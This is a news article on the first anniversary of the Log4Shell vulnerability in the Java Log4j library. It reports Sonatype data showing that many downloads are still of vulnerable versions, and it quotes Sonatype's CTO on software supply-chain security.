Log4Shell is one to appear in data breaches over the next decade
This week marks the first anniversary of the discovery of the Log4j/Log4Shel vulnerabilityl which affects the Java logging library. And it is that despite a year having passed since the incident, the number of downloads of vulnerable versions of Log4j is still high, since it has been calculated around 30-40% of all downloads are for the exposed version.
As recently reported, many organizations remain vulnerable even though patched versions soon became available.
For those who are unaware of vulnerability, they should know that is notable because the attack can be carried out on Java applications that record values obtained from external sources, for example, by displaying problematic values in error messages.
The Log4j vulnerability was a wake-up call for all organizations and a moment many security professionals would like to forget. However, with the widespread use of Log4j and a growing network of internal and third-party servers for patching, the vulnerability will be felt for a long time.
It is observed that almost all projects using frameworks like Apache Struts, Apache Solr, Apache Druid or Apache Flink are affected including Steam, Apple iCloud, Minecraft clients and servers.
Sonatype has produced a resource center to display the current state of vulnerability, as well as a tool to help companies scan their open source code to see if it's affected.
The dashboard shows the percentage of Log4j downloads that are still vulnerable (currently around 34% since last December). It also shows the parts of the world that have seen the highest percentage of vulnerable downloads.
Brian Fox, CTO of Sonatype, says:
Log4j was a stark reminder of the critical importance of securing the software supply chain. It was used in virtually all modern applications and affected the services of organizations around the world. One year after the Log4Shell incident, the situation remains grim. According to our data, 30-40% of all Log4j downloads are for the vulnerable version, even though a patch was released within 24 hours of the premature vulnerability disclosure.
In addition to this, he adds that it is:
Imperative for organizations to recognize that most open source risks lie with consumers, who should adopt best practices rather than blame faulty code. Log4j is not an isolated incident: 96% of downloads of vulnerable open source components had a patched version.
Organizations need better visibility of every component used in their software supply chains. This is why quality software composition analysis solutions are so important today as the world contemplates the utility of SBOMs in the future.
UK and European software policy should require commercial consumers of free software to be able to carry out the equivalent of a specific recall, just as manufacturers of physical goods like the car industry expect. General visibility will grant additional benefits to organizations, such as the ability to make decisions on it.
As we go it became clear that hackers would continue to exploit the vulnerability. In February, Iranian state-sponsored hackers used the flaw to enter a US government network, illegally mine cryptocurrency, steal credentials and change passwords. Then, in October, a group associated with the Chinese government used the vulnerability to launch attacks against various targets, including a Middle Eastern country and an electronics manufacturer.
The Log4j vulnerability continues to affect enterprises today. It consistently ranks first or second in threat reports from different cybersecurity consultancies, affecting 41% of organizations globally as of October 2022.